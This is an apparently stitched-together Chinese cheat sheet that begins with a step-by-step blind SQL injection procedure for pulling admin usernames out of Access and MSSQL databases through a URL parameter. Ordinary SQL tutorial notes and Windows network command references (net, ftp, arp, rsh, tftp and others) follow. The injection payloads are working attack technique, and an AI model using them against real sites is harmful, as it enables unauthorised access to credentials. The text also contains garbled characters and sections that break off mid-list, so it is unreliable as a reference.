检测可否注入
http://127.0.0.1/xx?id=11 and 1=1 (正常页面)
http://127.0.0.1/xx?id=11 and 1=2 (出错页面)

检测表段的
http://127.0.0.1/xx?id=11 and exists (select * from admin)

检测字段的
http://127.0.0.1/xx?id=11 and exists (select username from admin)

检测ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)

检测长度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

检测长度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

检测是否为MSSQL数据库
http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)

检测是否为英文

(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)

(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)

检测英文的范围

(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)

(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)

检测那个字符

(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)

(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)

常用函数

Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII码

Access:chr(数字) SQLServer:nchar(数字)
作用:与asc相反,根据ASCII码返回字符

Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串

Access:abc(数字) SQLServer:abc (数字)
作用:返回数字的绝对值(在猜解汉字的时候会用到)

Access:A between B And C SQLServer:A between B And C
作用:判断A是否界于B与C之间

and exists(Select top 1 * From 用户 order by id)

1.在查询结果中显示列名:

a.用as关键字:select name as ’姓名’ from students order by age
b.直接表示:select name ’姓名’ from students order by age

2.精确查找:

a.用in限定范围:select * from students where native in (’湖南’, ’四川’)
b.between…and:select * from students where age between 20 and 30

c.“=”:select * from students where name = ’李山’

d. like:select * from students where name like ’李%’ (注意查询条件中有“%”,则说明是部分匹配,而且还有先后信息在里面,即查找以“李”开头的匹配项。所以若查询有“李”的所有对象,应该命令:’%李%’;若是第二个字为李,则应为’_李%’或’_李’或’_李_’。)

e.[]匹配检查符:select * from courses where cno like ’[AC]%’ (表示或的关系,与"in(…)"类似,而且"[]"可以表示范围,如:select * from courses where cno like ’[A-C]%’)

3.对于时间类型变量的处理

a.smalldatetime:直接按照字符串处理的方式进行处理,例如:select * from students where birth > = ’1980-1-1’ and birth <= ’1980-12-31’

4.集函数

a.count()求和,如:select count(*) from students (求学生总人数)
b.avg(列)求平均,如:select avg(mark) from grades where cno=’B2’
c.max(列)和min(列),求最大与最小

5.分组group

常用于统计时,如分组查总数:select gender,count(sno) from students group by gender(查看男女学生各有多少)
注意:从哪种角度分组就从哪列"group by"
对于多重分组,只需将分组规则罗列。比如查询各届各专业的男女同学人数 ,那么分组规则有:届别(grade)、专业(mno)和
性别(gender),所以有"group by grade, mno, gender"
select grade, mno, gender, count(*) from students group by grade, mno, gender
通常group还和having联用,比如查询1门课以上不及格的学生,则按学号(sno)分类有:
select sno,count(*) from grades where mark<60 group by sno having count(*)>1

6.UNION联合

合并查询结果,如:
SELECT * FROM students WHERE name like ‘张%’UNION [ALL] SELECT * FROM students WHERE name like ‘李%’

7.多表查询

a.内连接
select g.sno,s.name,c.coursename from grades g JOIN students s ON g.sno=s.sno JOIN courses c ON g.cno=c.cno
(注意可以引用别名)

b.外连接

b1.左连接

select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades ON courses.cno=grades.cno group by courses.cno

左连接特点:显示全部左边表中的所有项目,即使其中有些项中的数据未填写完全。

左外连接返回那些存在于左表而右表中却没有的行,再加上内连接的行。

b2.右连接

与左连接类似

b3.全连接

select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno

两边表中的内容全部显示

c.自身连接

select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno

采用别名解决问题。

d.交*连接

select lastname+firstname from lastname CROSS JOIN firstanme

相当于做笛卡儿积

8.嵌套查询

a.用关键字IN,如查询猪猪山的同乡:

select * from students where native in (select native from students where name=’猪猪’)

b.使用关键字EXIST,比如,下面两句是等价的:

select * from students where sno in (select sno from grades where cno=’B2’)
select * from students where exists (select * from grades where grades.sno=students.sno AND cno=’B2’)

9.关于排序order

a.对于排序order,有两种方法:asc升序和desc降序

b.对于排序order,可以按照查询条件中的某项排列,而且这项可用数字表示,如:
select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)>85 order by 3

10.其他

a.对于有空格的识别名称,应该用"[]"括住。

b.对于某列中没有数据的特定查询可以用null判断,如select sno,courseno from grades where mark IS NULL

c.注意区分在嵌套查询中使用的any与all的区别,any相当于逻辑运算“  ”而all则相当于逻辑运算“&&”

d.注意在做否定意义的查询是小心进入陷阱:

如,没有选修‘B2’课程的学生 :
select students.* from students, grades where students.sno=grades.sno AND grades.cno <> ’B2’

上面的查询方式是错误的,正确方式见下方:
select * from students where not exists (select * from grades where grades.sno=students.sno AND cno=’B2’)

11.关于有难度多重嵌套查询的解决思想:如,选修了全睝@纬痰难?br>select * from students where not exists (select * from courses where NOT EXISTS (select * from grades where sno=students.sno AND cno=courses.cno))

最外一重:从学生表中选,排除那些有课没选的。用not exist。由于讨论对象是课程,所以第二重查询从course表中找,排除那些选了课的即可

Nbtstat 命令

该诊断命令使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。该命令只有在安装了TCP/IP 协议之后才可用。

nbtstat [-a remotename] [-A IP address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]

参数

-a remotename

使用远程计算机的名称列出其名称表。

-A IP address

使用远程计算机的 IP 地址并列出名称表。

-c

给定每个名称的 IP 地址并列出 NetBIOS 名称缓存的内容。

-n

列出本地 NetBIOS 名称。“已注册”表明该名称已被广播 (Bnode) 或者 WINS(其他节点类型)注册。

-R

清除 NetBIOS 名称缓存中的所有名称后,重新装入 Lmhosts 文件。

-r

列出 Windows 网络名称解析的名称解析统计。在配置使用 WINS 的 Windows 2000 计算机上,此选项返回要通过广播或WINS 来解析和注册的名称数。

-S

显示客户端和服务器会话,只通过 IP 地址列出远程计算机。

-s

显示客户端和服务器会话。尝试将远程计算机 IP 地址转换成使用主机文件的名称。

interval

重新显示选中的统计,在每个显示之间暂停 interval 秒。按 CTRL+C 停止重新显示统计信息。如果省略该参数,nbtstat 打印一次当前的配置信息。

Ping 命令

验证与远程计算机的连接。该命令只有在安装了 TCP/IP 协议后才可以使用。

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [-j computer-list] | [-k computer-list] [-w timeout] destination-list

参数

-t

Ping 指定的计算机直到中断。

-a

将地址解析为计算机名。

-n count

发送 count 指定的 ECHO 数据包数。默认值为 4。

-l length

发送包含由 length 指定的数据量的 ECHO 数据包。默认为 32 字节;最大值是 65,527。

-f

在数据包中发送“不要分段”标志。数据包就不会被路由上的网关分段。

-i ttl

将“生存时间”字段设置为 ttl 指定的值。

-v tos

将“服务类型”字段设置为 tos 指定的值。

-r count

在“记录路由”字段中记录传出和返回数据包的路由。count 可以指定最少 1 台,最多 9 台计算机。

-s count

指定 count 指定的跃点数的时间戳。

-j computer-list

利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为9。

-k computer-list

利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为9。

-w timeout

指定超时间隔,单位为毫秒。

destination-list

指定要 ping 的远程计算机。

Arp 命令

显示和修改“地址解析协议”(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译表。该命令只有在安装了 TCP/IP 协议之后才可用。

arp -a [inet_addr] [-N [if_addr]

arp -d inet_addr [if_addr]

arp -s inet_addr ether_addr [if_addr]

参数

-a

通过询问 TCP/IP 显示当前 ARP 项。如果指定了 inet_addr,则只显示指定计算机的 IP 和物理地址。

-g

与 -a 相同。

inet_addr

以加点的十进制标记指定 IP 地址。

-N

显示由 if_addr 指定的网络界面 ARP 项。

if_addr

指定需要修改其地址转换表接口的 IP 地址(如果有的话)。如果不存在,将使用第一个可适用的接口。

-d

删除由 inet_addr 指定的项。

-s

在 ARP 缓存中添加项,将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物理地址由以连字符分隔的6 个十六进制字节给定。使用带点的十进制标记指定 IP 地址。项是永久性的,即在超时到期后项自动从缓存删除。

ether_addr 指定物理地址。

Finger 命令

在运行 Finger 服务的指定系统上显示有关用户的信息。根据远程系统输出不同的变量。该命令只有在安装了 TCP/IP 协议之后才可用。

finger [-l] [user]@computer[…]

参数

-l

以长列表格式显示信息。

user

指定要获得相关信息的用户。省略用户参数以显示指定计算机上所有用户的信息:

@computer

Ftp

将文件传送到正在运行 FTP 服务的远程计算机或从正在运行 FTP 服务的远程计算机传送文件(有时称作 daemon)。Ftp可以交互使用。单击“相关主题”列表中的“ftp 命令”以获得可用的“ftp”子命令描述。该命令只有在安装了 TCP/IP 协议之后才可用。Ftp 是一种服务,一旦启动,将创建在其中可以使用ftp 命令的子环境,通过键入 quit 子命令可以从子环境返回到 Windows 2000 命令提示符。当 ftp 子环境运行时,它由 ftp 命令提示符代表。

ftp [-v] [-n] [-i] [-d] [-g] [-s:filename] [-a] [-w:windowsize] [computer]

参数

-v

禁止显示远程服务器响应。

-n

禁止自动登录到初始连接。

-i

多个文件传送时关闭交互提示。

-d

启用调试、显示在客户端和服务器之间传递的所有 ftp 命令。

-g

禁用文件名组,它允许在本地文件和路径名中使用通配符字符(* 和 ?)。(请参阅联机“命令参考”中的 glob 命令。)

-s: filename

指定包含 ftp 命令的文本文件;当 ftp 启动后,这些命令将自动运行。该参数中不允许有空格。使用该开关而不是重定向(> )。

-a

在捆绑数据连接时使用任何本地接口。

-w:windowsize

替代默认大小为 4096 的传送缓冲区。

computer

指定要连接到远程计算机的计算机名或 IP 地址。如果指定,计算机必须是行的最后一个参数。

Rcp 命令

在 Windows 2000 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件。rcp 命令是一个连接命令,从Windows 2000 计算机发出该命令时,也可以用于其他传输在两台运行 rshd 的计算机之间复制文件。rshd 端口监控程序可以在 UNIX 计算机上使用,而在Windows 2000 上不能使用,所以 Windows 2000 计算机仅可以作为发出命令的系统参与。远程计算机必须也通过运行 rshd 提供 rcp 实用程序。

rcp [-a | -b] [-h] [-r] source1 source2 … sourceN destination

参数

-a

指定 ASCII 传输模式。此模式在传出文件上将回车/换行符转换为回车符,在传入文件中将换行符转换为回车/换行符。该模式为默认的传输模式。

-b

指定二进制图像传输模式。没有执行回车/换行符转换。

-h

传输 Windows 2000 计算机上标记为隐藏属性的源文件。如果没有该选项,在 rcp 命令行上指定隐藏文件的效果与文件不存在一样。

-r

将源的所有子目录内容递归复制到目标。source 和 destination 都必须是目录,虽然即使源不是目录,使用-r 也能够工作。但将没有递归。

source 和 destination

格式必须为 [computer[.user]:]filename。如果忽略了 [computer[.user]:] 部分,计算机将假定为本地计算机。如果省略了 [.user] 部分,将使用当前登录的 Windows 2000 用户名。如果使用了完全合格的计算机名,其中包含句点(.) 分隔符,则必须包含 [.user]。否则,计算机名的最后部分将解释为用户名。如果指定了多个源文件,则destination 必须是目录。

如果文件名不是以 UNIX 的正斜杠 (/) 或 Windows 2000 系统的反斜杠 () 打头,则假定相对于当前的工作目录。在Windows 2000 中,这是发出命令的目录。在远程系统中,这是远程用户的登录目录。句点 (.) 表示当前的目录。在远程路径中使用转义字符(、" 或 ‘),以便在远程计算机中使用通配符。

Rexec 命令

在运行 REXEC 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了TCP/IP 协议后才可以使用该命令。

rexec computer [-l username] [-n] command

参数

computer

指定要运行 command 的远程计算机。

-l username

指定远程计算机上的用户名。

-n

将 rexec 的输入重定向到 NULL。

command

指定要运行的命令。

Tracert 命令

该诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标,以决定到达目标采用的路由。要在转发数据包上的TTL 之前至少递减 1,必需路径上的每个路由器,所以 TTL 是有效的跃点计数。数据包上的 TTL 到达 0 时,路由器应该将“ICMP 已超时”的消息发送回源系统。Tracert 先发送 TTL 为 1 的回显数据包,并在随后的每次发送过程将 TTL 递增 1,直到目标响应或 TTL 达到最大值,从而确定路由。路由通过检查中级路由器发送回的“ICMP 已超时”的消息来确定路由。不过,有些路由器悄悄地下传包含过期 TTL 值的数据包,而 tracert 看不到。

tracert [-d] [-h maximum_hops] [-j computer-list] [-w timeout]target_name

参数

/d

指定不将地址解析为计算机名。

-h maximum_hops

指定搜索目标的最大跃点数。

-j computer-list

指定沿 computer-list 的稀疏源路由。

-w timeout

每次应答等待 timeout 指定的微秒数。

target_name

目标计算机的名称。 NET命令的基本用法

Net 命令

以下综合了WINDOWS 98,WINDOWS WORKSTATION和WINDOWS SERVER 三个操作系统关于NET命令的解释,希望可以更全面一些。

先说一些:

(1)NET命令是一个命令行命令。

(2)管理网络环境、服务、用户、登陆。。。。等本地信息

(3)WIN 98,WIN WORKSTATION和WIN NT都内置了NET命令。

(4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。

(5)WORKSTATION和SERVER中的NET命令基本相同。

(6)获得HELP

(1)在NT下可以用图形的方式,开始-》帮助-》索引-》输入NET

(2)在COMMAND下可以用字符方式,NET /?或NET或NET HELP得到一些方法 相应的方法的帮助NETCOMMAND /HELP或NET HELP COMMAND 或NET COMMAND /? 另对于错误NET HELPMSG MESSAGE#是4位数

(7)强制参数 所有net命令接受选项/yes和/no(可缩写为/y和/n)。[简单的说就是预先给系统的 提问一个答案]

(8)有一些命令是马上产生作用并永久保存的,使用的时候要慎重

(9)对于NET命令的功能都可以找到相应的图形工具的解决方案

(10)命令的组成 命令 参数 选项 | 参数 选项 | 参数 选项 |。。。。。。 罗里罗嗦说了一大堆,其实就是6和7有用,呵呵。另有两件事:

(1)在NT的NET命令中有一些参数是只有在SERVER环境中才能使用的

(2)在WIN98的NET命令中有一些参数不能在DOS-WIN中使用,只能在DOS环境中使用

下面对NET命令的不同参数的基本用法做一些初步的介绍:

一、NET VIEW

作 用:显示域列表、计算机列表或指定计算机的共享资源列表。

命令格式:net view [\computername | /domain[:domainname]

参数介绍:

(1)键入不带参数的net view显示当前域的计算机列表。

(2)\computername 指定要查看其共享资源的计算机。

(3)/domain[:domainname]指定要查看其可用计算机的域。

简单事例:

(1)net view \YFANG查看YFANG的共享资源列表。

(2)net view /domain:LOVE查看LOVE域中的机器列表。

二、NET USER

作 用:添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users。

命令格式:net user [username [password | *] [options] [/domain]

参数介绍:

(1)键入不带参数的net user查看计算机上的用户帐号列表。

(2)username添加、删除、更改或查看用户帐号名。

(3)password为用户帐号分配或更改密码。

(4)*提示输入密码。

(5)/domain在计算机主域的主域控制器中执行操作。

简单事例:

(1)net user yfang查看用户YFANG的信息

三、NET USE

作 用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。

命令格式:net use [devicename | *] [\computernamesharename[volume] [password | *] [/user:[domainname]username] [/delete] | [/persistent:{yes | no]}

参数介绍:

键入不带参数的net use列出网络连接。

devicename指定要连接到的资源名称或要断开的设备名称。

\computernamesharename服务器及共享资源的名称。

password访问共享资源的密码。

*提示键入密码。

/user指定进行连接的另外一个用户。

domainname指定另一个域。

username指定登录的用户名。

/home将用户连接到其宿主目录。

/delete取消指定网络连接。

/persistent控制永久网络连接的使用。

简单事例:

(1)net use e: \YFANGTEMP将\YFANGTEMP目录建立为E盘

(2)net use e: \YFANGTEMP /delete断开连接

四、NET TIME

作 用:使计算机的时钟与另一台计算机或域的时间同步。

命令格式:net time [\computername | /domain[:name] [/set]

参数介绍:

(1)\computername要检查或同步的服务器名。

(2)/domain[:name]指定要与其时间同步的域。

(3)/set使本计算机时钟与指定计算机或域的时钟同步。

下面的这4个参数是相关的,所以一起介绍

五、Net Start

作 用:启动服务,或显示已启动服务的列表。

命令格式:net start service

六、Net Pause

作 用:暂停正在运行的服务。

命令格式:net pause service

七、Net Continue

作 用:重新激活挂起的服务。

命令格式:net continue service

八、NET STOP

作 用:停止 Windows NT 网络服务。

命令格式:net stop service

参数介绍:我们来看看这些服务都是什么

(1)alerter(警报)

(2)client service for netware(Netware 客户端服务)

(3)clipbook server(剪贴簿服务器)

(4)computer browser(计算机浏览器)

(5)directory replicator(目录复制器)

(6)ftp publishing service (ftp )(ftp 发行服务)

(7)lpdsvc

(8)net logon(网络登录)

(9)network dde(网络 dde)

(10)network dde dsdm(网络 dde dsdm)

(11)network monitor agent(网络监控代理)

(12)nt lm security support provider(NT LM 安全性支持提供)

(13)ole(对象链接与嵌入)

(14)remote access connection manager(远程访问连接管理器)

(15)remote access isnsap service(远程访问 isnsap 服务)

(16)remote access server(远程访问服务器)

(17)remote procedure call (rpc) locator(远程过程调用定位器)

(18)remote procedure call (rpc) service(远程过程调用服务)

(19)schedule(调度)

(20)server(服务器)

(21)simple tcp/ip services(简单 TCP/IP 服务)

(22)snmp

(23)spooler(后台打印程序)

(24)tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具)

(25)ups

(26)workstation(工作站)

(27)messenger(信使)

(28)dhcp client

(29)eventlog 以下这些SERVICE只能在NT SERVER上使用

(1)file server for macintosh

(2)gateway service for netware

(3)microsoft dhcp server

(4)print server for macintosh

(5)remoteboot

(6)windows internet name service

九、Net Statistics

作 用:显示本地工作站或服务器服务的统计记录。

命令格式:net statistics [workstation | server]

参数介绍:

(1)键入不带参数的net statistics列出其统计信息可用的运行服务。

(2)workstation显示本地工作站服务的统计信息。

(3)server显示本地服务器服务的统计信息。

简单事例:

(1)net statistics server | more显示服务器服务的统计信息

十、Net Share

作 用:创建、删除或显示共享资源。

命令格式:net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]

参数介绍:

(1)键入不带参数的net share显示本地计算机上所有共享资源的信息。

(2)sharename是共享资源的网络名称。

(3)drive:path指定共享目录的绝对路径。

(4)/users:number设置可同时访问共享资源的最大用户数。

(5)/unlimited不限制同时访问共享资源的用户数。

(6)/remark:"text "添加关于资源的注释,注释文字用引号引住。

简单事例:

(1)net share mylove=c: emp /remark:"my first share"以mylove为共享名共享C: emp

(2)net share mylove /delete停止共享mylove目录

十一、Net Session

作 用:列出或断开本地计算机和与之连接的客户端的会话,也可以写为net sessions或net sess。

命令格式:net session [\computername] [/delete]

参数介绍:

(1)键入不带参数的net session显示所有与本地计算机的会话的信息。

(2)\computername标识要列出或断开会话的计算机。

(3)/delete结束与\computername计算机会话并关闭本次会话期间计算机的所有.

简单事例:

(1)net session \YFANG要显示计算机名为YFANG的客户端会话信息列表。

十二、Net Send

作 用:向网络的其他用户、计算机或通信名发送消息。

命令格式:net send {name | * | /domain[:name] | /users} message

参数介绍:

(1)name要接收发送消息的用户名、计算机名或通信名。

(2)*将消息发送到组中所有名称。

(3)/domain[:name]将消息发送到计算机域中的所有名称。

(4)/users将消息发送到与服务器连接的所有用户。

(5)message作为消息发送的文本。

简单事例:

(1)net send /users server will shutdown in 5 minutes.给所有连接到服务器的用户发送消息

十三、Net Print

作 用:显示或控制打印作业及打印队列。

命令格式:net print [\computername ] job# [/hold | /release | /delete]

参数介绍:

(1)computername共享打印机队列的计算机名。

(2)sharename打印队列名称。

(3)job#在打印机队列中分配给打印作业的标识号。

(4)/hold使用 job# 时,在打印机队列中使打印作业等待。

(5)/release释放保留的打印作业。

(6)/delete从打印机队列中删除打印作业。

简单事例:

(1)net print \YFANGSEEME列出\YFANG计算机上SEEME打印机队列的目录

十四、Net Name

作 用:添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表。

命令格式:net name [name [/add | /delete]

参数介绍:

(1)键入不带参数的net name列出当前使用的名称。

(2)name指定接收消息的名称。

(3)/add将名称添加到计算机中。

(4)/delete从计算机中删除名称。

十五、Net Localgroup

作 用:添加、显示或更改本地组。

命令格式:net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]

参数介绍:

(1)键入不带参数的net localgroup显示服务器名称和计算机的本地组名称。

(2)groupname要添加、扩充或删除的本地组名称。

(3)/comment: "text "为新建或现有组添加注释。

(4)/domain在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作?

(5)name [ …]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名。

(6)/add将全局组名或用户名添加到本地组中。

(7)/delete从本地组中删除组名或用户名。

简单事例:

(1)net localgroup love /add将名为love的本地组添加到本地用户帐号数据库

(2)net localgroup love显示love本地组中的用户

十六、Net Group

作 用:在 Windows NT Server 域中添加、显示或更改全局组。

命令格式:net group groupname {/add [/comment:"text "] | /delete} [/domain]

参数介绍:

(1)键入不带参数的net group显示服务器名称及服务器的组名称。

(2)groupname要添加、扩展或删除的组。

(3)/comment:"text "为新建组或现有组添加注释。

(4)/domain在当前域的主域控制器中执行该操作,否则在本地计算机上执行操作? ?

(5)username[ …]列表显示要添加到组或从组中删除的一个或多个用户。

(6)/add添加组或在组中添加用户名。

(7)/delete删除组或从组中删除用户名。

简单事例:

(1)net group love yfang1 yfang2 /add将现有用户帐号yfang1和yfang2添加到本地计算机的love组

十七、Net File

作 用:显示某服务器上所有打开的共享文件名及锁定文件数。

命令格式:net file [id [/close]

参数介绍:

(1)键入不带参数的net file获得服务器上打开文件的列表。

(2)id文件标识号。

(3)/close关闭打开的文件并释放锁定记录。

十八、Net Config

作 用:显示当前运行的可配置服务,或显示并更改某项服务的设置。

命令格式:net config [service [options]

参数介绍:

(1)键入不带参数的net config显示可配置服务的列表。

(2)service通过net config命令进行配置的服务(server或workstation)

(3)options服务的特定选项。

十九、Net Computer

作 用:从域数据库中添加或删除计算机。

命令格式:net computer \computername {/add | /del}

参数介绍:

(1)\computername指定要添加到域或从域中删除的计算机。

(2)/add将指定计算机添加到域。

(3)/del将指定计算机从域中删除。

简单事例:

(1)net computer \cc /add将计算机 cc 添加到登录域

二十、Net Accounts

作 用:更新用户帐号数据库、更改密码及所有帐号的登录要求。

命令格式:net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]

参数介绍:

(1)键入不带参数的net accounts显示当前密码设置、登录时限及域信息。

(2)/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时

(3)/minpwlen:length设置用户帐号密码的最少字符数。

(4)/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数。

(5)/minpwage:days设置用户必须保持原密码的最小天数。

(6)/uniquepw:number要求用户更改密码时,必须在经过number次后才能重复使用 与之相同的密码。

(7)/domain在当前域的主域控制器上执行该操作。

(8)/sync当用于主域控制器时,该命令使域中所有备份域控制器同步

简单事例:

(1)net accounts /minpwlen:7将用户帐号密码的最少字符数设置为7

———————-上面介绍的是NET命令在WINNT下的基本用法

———————-下面我们看看NET命令在WIN98下的基本用法

在WIN98中NET命令也有一些参数的名字和功能及简单的使用方法和WINNT下的相应的参数的用法相同

其中有

(1)NET TIME命令

(2)NET PRINT命令

(3)NET USE命令

(4)NET VIEW命令

在WIN98中NET命令有一些参数的名字和WINNT下的相应的参数的名字相同,但其用法却有些不同

其中有

(1)NET START

作 用:启动相应的服务。(不能在DOS-WIN中用)

命令格式:NET START [BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI | NWLINK] [/LIST] [/YES] [/VERBOSE]

(2)NET STOP

作 用:停止相应的服务.(不能在DOS-WIN中用)

命令格式:NET STOP [BASIC | NWREDIR | WORKSTATION | NETBEUI | NWLINK] [/YES]

在WIN98中NET命令还有一些参数是在98下才有的

其中有

(1)NET DIAG

作 用:运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息

命令格式:NET DIAGNOSTICS [/NAMES | /STATUS]

(2)NET INIT

作 用:不通过绑定来加载协议或网卡驱动(不能在DOS-WIN中用)

命令格式:NET INITIALIZE [/DYNAMIC]

(3)NET LOGOFF

作 用:断开连接的共享资源(不能在DOS-WIN中用) (

(4)NET LOGON

作 用:在WORKGROUP中登陆(不能在DOS-WIN中用)

命令格式:NET LOGON [user [password | ?] [/DOMAIN:name] [/YES] [/SAVEPW:NO]

(5)NET PASSWORD

作 用:更改你的网络登陆口令(不能在DOS-WIN中用)

命令格式:NET PASSWORD \computer | /DOMAIN:name [user [oldpassword [newpassword]]

FTP 命令

FTP命令是Internet用户使用最频繁的命令之一,不论是在DOS还是UNIX操作系统下使用FTP,都会遇到大量的FTP内部命令,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,对于现在拨号上网的用户,如果ISP提供了shell可以使用nohup,那么ftp将是你最省钱的上download方式,ftp的命令行格式为:ftp -v -d -i -n -g[主机名]

-v 显示远程服务器的所有响应信息。

-d 使用调试方式。

-n 限制ftp的自动登录,即不使用.netrc文件。

-g 取消全局文件名。

ftp使用的内部命令如下(其中括号表示可选项):

1.![cmd[args]在本地机中执行交互shell、exit回到ftp环境,如!ls*.zip 。

2.¥ macro-ame[args]执行宏定义macro-name。

3.account[password]提供登录远程系统成功后访问系统资源所需的补充口令 。

4.appendlocal-file[remote-file]将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。

5.ascii 使用ascii类型传输方式。

6.bell每个命令执行完毕后计算机响铃一次。

7.bin使用二进制文件传输方式。

8.bye退出ftp会话过程。

9。case在使用mget时,将远程主机文件名中的大写转为小写字母。

10.cd remote-dir 进入远程主机目录。

11.cdup进入远程主机目录的父目录。

12.chmod modefile-name将远程主机文件file-name的存取方式设置为mode,如chmod 777 a.out。

13.close中断与远程服务器的ftp会话(与open对应)。

14.cr使用asscii方式传输文件时,将回车换行转换为回行。

15.delete remote-file删除远程主机文件。

16.debug[debug-value]设置调试方式,显示发送至远程主机的每条命令,如debup3,若 设为0,表示取消debug。

17.dir[remote-dir][local-file]显示远程主机目录,并将结果存入local-file。

18.disconnection同close。

19.form format将文件传输方式设置为format,缺省为file方式。

20.getremote-file[local-file]将远程主机的文件remote-file传至本地硬盘的local-file。

21.glob设置mdelete、mget、mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。

22.hash每传输1024字节,显示一个hash符号(#)。

23.help[cmd]显示ftp内部命令cmd的帮助信息,如help get。

24.idle[seconds]将远程服务器的休眠计时器设为[seconds]秒。

25.image设置二进制传输方式(同binary)

26.lcd[dir]将本地工作目录切换至dir。

27.ls[remote-dir][local-file]显示远程目录remote-dir,并存入本地local-file。

28.macdef macro-name定义一个宏,遇到macdef下的空行时,宏定义结束。

29.mdelete[remote-file]删除远程主机文件。

30.mdir remote-files local-file与dir类似,但可指定多个远程文件,如mdir*.o.*.zipoutfile。

31.mget remote-files传输多个远程文件。

32.mkdir dir-name 在远程主机中建一目录。

33.mls remote-file local-file同nlist,但可指定多个文件名。

34.mode[mode-name]将文件传输方式设置为mode-name,缺省为stream方式。

35.modtime file-name显示远程主机文件的最后修改时间。

36.mput local-file将多个文件传输至远程主机。

37.newerfile-name如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。

38.nlist[remote-dir][local-file]显示远程主机目录的文件清单,并存入本地硬盘的local-file。

39.nmap[inpatternoutpattern]设置文件名映射机制,使得文件传输时,文件中的某些字符相互转换,如nmap¥1.¥2.¥3[¥1,¥2].[¥2,¥3],则传输文件a1.a2.a3时,文件名变为a1、a2,该命令特别适用于远程主机为非U-NIX机的情况。

40.ntrans[inchars[outchars]设置文件名%

Route 命令

控制网络路由表。该命令只有在安装了 TCP/IP 协议后才可以使用。

route [-f] [-p] [command [destination] [mask subnetmask] [gateway] [metric costmetric]

参数

-f

清除所有网关入口的路由表。如果该参数与某个命令组合使用,路由表将在运行命令前清除。

-p

该参数与 add 命令一起使用时,将使路由在系统引导程序之间持久存在。默认情况下,系统重新启动时不保留路由。与 print 命令一起使用时,显示已注册的持久路由列表。忽略其他所有总是影响相应持久路由的命令。

command

指定下列的一个命令。

命令 目的

print 打印路由

add 添加路由

delete 删除路由

change 更改现存路由

destination

指定发送 command 的计算机。

mask subnetmask

指定与该路由条目关联的子网掩码。如果没有指定,将使用 255.255.255.255。

gateway

指定网关。

名为 Networks 的网络数据库文件和名为 Hosts 的计算机名数据库文件中均引用全部 destination 或 gateway 使用的符号名称。如果命令是 print 或 delete,目标和网关还可以使用通配符,也可以省略网关参数。

metric costmetric

指派整数跃点数(从 1 到 9999)在计算最快速、最可靠和(或)最便宜的路由时使用。

Rsh 命令

在运行 RSH 服务的远程计算机上运行命令。该命令只有在安装了 TCP/IP 协议后才可以使用。

rsh computer [-l username] [-n] command

参数

computer

指定运行 command 的远程计算机。

-l username

指定远程计算机上使用的用户名。如果省略,则使用登录的用户名。

-n

将 rsh 的输入重定向到 NULL。

command

指定要运行的命令。

Tftp 命令

将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件。该命令只有在安装了TCP/IP 协议后才可以使用。

tftp [-i] computer [get | put] source [destination]

参数

-i

指定二进制图像传送模式(也称为“八位字节”)。在二进制图像模式中,文件一个字节接一个字节地逐字移动。在传送二进制文件时使用该模式。

如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。此模式将 EOL 字符转换为 UNIX 的回车符和个人计算机的回车符/换行符。在传送文本文件时应使用此模式。如果文件传送成功,将显示数据传输率。

computer

